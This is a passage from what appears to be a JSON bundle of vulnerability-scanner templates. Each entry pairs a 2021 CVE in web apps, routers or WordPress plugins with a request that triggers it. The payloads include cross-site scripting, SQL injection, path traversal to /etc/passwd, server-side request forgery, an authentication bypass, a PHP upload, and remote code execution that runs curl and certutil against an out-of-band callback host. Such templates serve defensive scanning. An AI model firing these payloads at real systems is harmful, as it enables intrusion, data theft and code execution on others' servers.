\"\\\"admin\\\":true\")"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"id","group":1,"regex":["\"id\":([0-9]+)"],"internal":true,"part":"body"},{"type":"regex","name":"token","group":1,"regex":["\"token\":\"(.*)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31250","info":{"name":"CHIYU TCP/IP Converter - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/if.cgi?redirect=setting.htm&failure=fail.htm&type=ap_tcps_apply&TF_ip=443&TF_submask=0&TF_submask=%22%3E%3Cscript%3Ealert%28{{randstr}}%29%3C%2Fscript%3E&radio_ping_block=0&max_tcp=3&B_apply=APPLY"],"headers":{"Authorization":"Basic OmFkbWlu"},"host-redirects":true,"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["\"><script>alert({{randstr}})</script>"]}]}]},{"id":"CVE-2021-24987","info":{"name":"WordPress Super Socializer <7.13.30 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=the_champ_sharing_count&urls[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"facebook_urls\":[[\"<img src=x onerror=alert(document.domain)>\"]]"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3293","info":{"name":"emlog 5.3.1 Path Disclosure","severity":"medium"},"requests":[{"raw":["GET /t/index.php?action[]=aaaa HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<b>Warning</b>","on line","expects parameter"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25033","info":{"name":"Noptin < 1.6.5 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?noptin_ns=email_click&to=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24276","info":{"name":"WordPress Supsystic Contact Form <1.7.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=contact-form-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-28073","info":{"name":"Ntopng Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/lua/%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2f%2e%2ffind_prefs.lua.css","{{BaseURL}}/lua/.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2f.%2ffind_prefs.lua.css"],"matchers-condition":"and","matchers":[{"type":"word","words":["application/json"],"part":"header"},{"type":"word","words":["\"results\":","\"name\":","\"tab\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29490","info":{"name":"Jellyfin 10.7.2 - Server Side Request Forgery","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Images/Remote?imageUrl=https://oast.me/","{{BaseURL}}/Items/RemoteSearch/Image?ImageUrl=https://oast.me/&ProviderName=TheMovieDB"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["<h1> Interactsh Server </h1>"]}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42063","info":{"name":"SAP Knowledge Warehouse <=7.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAPIrExtHelp/random/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<SVG ONLOAD=&#97&#108&#101&#114&#116(&#X64&#X6F&#X63&#X75&#X6D&#X65&#X6E&#X74&#X2E&#X64&#X6F&#X6D&#X61&#X69&#X6E)>","SAPIKS2"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32030","info":{"name":"ASUS GT-AC2900 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: asusrouter--\nReferer: {{BaseURL}}\nCookie: asus_token=\\0Invalid; clickedItem_tab=0\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"word","words":["get_cfg_clientlist","alias","model_name"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26710","info":{"name":"Redwood Report2Web 4.3.4.5 & 4.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/r2w/signIn.do?urll=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24554","info":{"name":"WordPress Paytm Donation <=1.3.2 - Authenticated SQL Injection","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","@timeout: 10s\nGET /wp-admin/admin.php?page=wp_paytm_donation&action=delete&id=0%20AND%20(SELECT%205581%20FROM%20(SELECT(SLEEP(6)))Pjwy) HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["duration_2>=6","status_code_2 == 200","contains(content_type_2, \"text/html\")","contains(body_2, \"paytm-settings_page_wp_paytm_donation\")"],"condition":"and"}]}]},{"id":"CVE-2021-43734","info":{"name":"kkFileview v4.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/getCorsFile?urlPath=file:///etc/passwd","{{BaseURL}}/getCorsFile?urlPath=file:///c://windows/win.ini"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:","for 16-bit app support"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24498","info":{"name":"WordPress Calendar Event Multi View <1.4.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /?cpmvc_id=1&cpmvc_do_action=mvparse&f=edit&month_index=0&delete=1&palette=0&paletteDefault=F00&calid=1&id=999&start=a%22%3E%3Csvg/%3E%3C%22&end=a%22%3E%3Csvg/onload=alert(1)%3E%3C%22 HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(1)><","Calendar Details"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21479","info":{"name":"SCIMono <0.0.19 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/Schemas/$%7B''.class.forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('js').eval('java.lang.Runtime.getRuntime().exec(\"id\")')%7D"],"matchers":[{"type":"word","part":"body","words":["The attribute value","java.lang.UNIXProcess@","has invalid value!","\"status\" : \"400\""],"condition":"and"}]}]},{"id":"CVE-2021-24335","info":{"name":"WordPress Car Repair Services & Auto Mechanic Theme <4.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-37573","info":{"name":"Tiny Java Web Server - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/te%3Cimg%20src=x%20onerror=alert(42)%3Est"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<H2>404 te<img src=x onerror=alert(42)>st not found</H2>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[404]}]}]},{"id":"CVE-2021-31589","info":{"name":"BeyondTrust Secure Remote Access Base <=6.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/appliance/login.ns?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","bomgar"],"case-insensitive":true,"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3110","info":{"name":"PrestaShop 1.7.7.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"application/json\")","contains(body, \"average_grade\")"],"condition":"and"}]}]},{"id":"CVE-2021-3017","info":{"name":"Intelbras WIN 300/WRN 342 - Credentials Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.asp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["def_wirelesspassword =","<title>Roteador Wireless</title>"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["def_wirelesspassword = \"([A-Za-z0-9=]+)\";"],"part":"body"}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20137","info":{"name":"Gryphon Tower - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/luci/site_access/?url=%22%20onfocus=alert(document.domain)%20autofocus=1"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["onfocus=alert(document.domain) autofocus=1>","Send Access Request URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3378","info":{"name":"FortiLogger 4.4.2.2 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /Config/SaveUploadedHotspotLogoFile HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundarySHHbUsfCoxlX1bpS\nAccept: application/json\nReferer: {{BaseURL}}\nConnection: close\nX-Requested-With: XMLHttpRequest\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\nContent-Disposition: form-data; name=\"file\"; filename=\"poc.txt\"\nContent-Type: image/png\n\n{{randstr}}\n\n------WebKitFormBoundarySHHbUsfCoxlX1bpS\n","GET /Assets/temp/hotspot/img/logohotspot.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["{{randstr}}"]},{"type":"word","part":"header","words":["text/plain","ASP.NET"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24150","info":{"name":"WordPress Like Button Rating <2.6.32 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /wp-admin/admin-ajax.php?action=likebtn_prx&likebtn_q={{base64('http://likebtn.com.oast.me')}}\" HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Interactsh Server"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38751","info":{"name":"ExponentCMS <= 2.6 - Host Header Injection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"headers":{"Host":"{{randstr}}.tld"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{randstr}}.tld","EXPONENT.PATH","EXPONENT.URL"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41349","info":{"name":"Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /autodiscover/autodiscover.json HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["alert(document.domain);","a=\"\""],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"word","negative":true,"words":["A potentially dangerous Request.Form value was detected from the client"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-32820","info":{"name":"Express-handlebars - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?layout=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","daemon:[x*]:0:0:","operator:[x*]:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-44515","info":{"name":"Zoho ManageEngine Desktop Central - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /STATE_ID/123/agentLogUploader HTTP/1.1\nHost: {{Hostname}}\nCookie: STATE_COOKIE=&_REQS/_TIME/123\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body) == 0"]},{"type":"word","part":"header","words":["UEMJSESSIONID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25078","info":{"name":"Affiliates Manager < 2.9.0 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /?wpam_id=1 HTTP/1.1\nHost: {{Hostname}}\nX-Forwarded-For: <img src onerror=alert(document.domain)>\n","GET /wp-admin/admin.php?page=wpam-clicktracking HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200 && status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"<img src onerror=alert(document.domain)>\")","contains(body_3, \"Affiliates Manager Click Tracking\")"],"condition":"and"}]}]},{"id":"CVE-2021-25074","info":{"name":"WordPress WebP Converter for Media < 4.0.3 - Unauthenticated Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/webp-converter-for-media/includes/passthru.php?src=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24214","info":{"name":"WordPress OpenID Connect Generic Client 3.8.0-3.8.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?login-error=<script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ERROR (<script>alert(document.domain)</script>):","Login with OpenID Connect"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21803","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?is2sim=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-42258","info":{"name":"BillQuick Web Suite SQL Injection","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST / HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\n\n__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode(\"{{VS}}\")}}&__VIEWSTATEGENERATOR={{url_encode(\"{{VSG}}\")}}&__EVENTVALIDATION={{url_encode(\"{{EV}}\")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96\n"],"cookie-reuse":true,"matchers":[{"type":"word","part":"body","words":["System.Data.SqlClient.SqlException","Incorrect syntax near","_ACCOUNTLOCKED"],"condition":"and"}],"extractors":[{"type":"xpath","name":"VS","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATE']"],"attribute":"value"},{"type":"xpath","name":"VSG","internal":true,"xpath":["/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"],"attribute":"value"},{"type":"xpath","name":"EV","internal":true,"xpath":["/html/body/form/div/input[@id='__EVENTVALIDATION']"],"attribute":"value"}]}]},{"id":"CVE-2021-24285","info":{"name":"WordPress Car Seller - Auto Classifieds Script - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=request_list_request&order_id=1 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x717a767671,0x685741416c436654694d446d416f717a6b54704a457a5077564653614970664166646654696e724d,0x7171786b71),NULL-- -\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["qzvvqhWAAlCfTiMDmAoqzkTpJEzPwVFSaIpfAfdfTinrMqqxkq"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22053","info":{"name":"Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"curl http://{{interactsh-url}}\")}__::.x/","{{BaseURL}}/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec(\"certutil -urlcache -split -f http://{{interactsh-url}}\")}__::.x/"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"regex","part":"interactsh_request","regex":["curl|CertUtil"]}]}]},{"id":"CVE-2021-43574","info":{"name":"Atmail 6.5.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/atmail/webmail/?format=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>\" does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[500,403],"condition":"or"}]}]},{"id":"CVE-2021-24342","info":{"name":"WordPress JNews Theme <8.0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /?ajax-request=jnews HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nlang=en_US&cat_id=6\"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["Content-Type: text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35587","info":{"name":"Oracle Access Manager - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/oam/server/opensso/sessionservice"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["x-oracle-dms-ecid","x-oracle-dms-rid"],"case-insensitive":true,"condition":"or"},{"type":"word","part":"body","words":["/oam/pages/css/general.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3297","info":{"name":"Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass","severity":"high"},"requests":[{"raw":["GET /status.htm HTTP/1.1\nHost: {{Hostname}}\nCookie: language=en; login=1\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["Running Time","Firmware Version","Firmware Build Time"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32789","info":{"name":"WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500"],"matchers-condition":"and","matchers":[{"type":"word","words":["sqli-test","attribute_counts","price_range","term"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24347","info":{"name":"WordPress SP Project & Document Manager <4.22 - Authenticated Shell Upload","severity":"high"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=sp-client-document-manager-fileview HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryaeBrxrKJzAF0Tgfy\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"cdm_upload_file_field\"\n\n{{nonce}}\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"_wp_http_referer\"\n\n/wordpress/wp-admin/admin.php?page=sp-client-document-manager-fileview&id=1\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-name\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"\"\nContent-Type: application/octet-stream\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-file[]\"; filename=\"{{randstr}}.pHP\"\nContent-Type: image/svg+xml\n\n<?php\n\necho \"CVE-2021-24347\";\n\n?>\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"dlg-upload-notes\"\n\n\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy\nContent-Disposition: form-data; name=\"sp-cdm-community-upload\"\n\nUpload\n------WebKitFormBoundaryaeBrxrKJzAF0Tgfy--\n","GET /wp-content/uploads/sp-client-document-manager/1/{{to_lower(\"{{randstr}}.pHP\")}} HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_4, \"text/html\")","status_code_4 == 200","contains(body_4, \"CVE-2021-24347\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"cdm_upload_file_field\" value=\"([0-9a-zA-Z]+)\""],"internal":true}]}]},{"id":"CVE-2021-3019","info":{"name":"ffay lanproxy Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/../conf/config.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/octet-stream"],"condition":"and"},{"type":"word","part":"body","words":["config.admin.username","config.admin.password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26085","info":{"name":"Atlassian Confluence Server - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/s/{{randstr}}/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<display-name>Confluence</display-name>","com.atlassian.confluence.setup.ConfluenceAppConfig"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46068","info":{"name":"Vehicle Service Management System - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Users.php?f=save HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 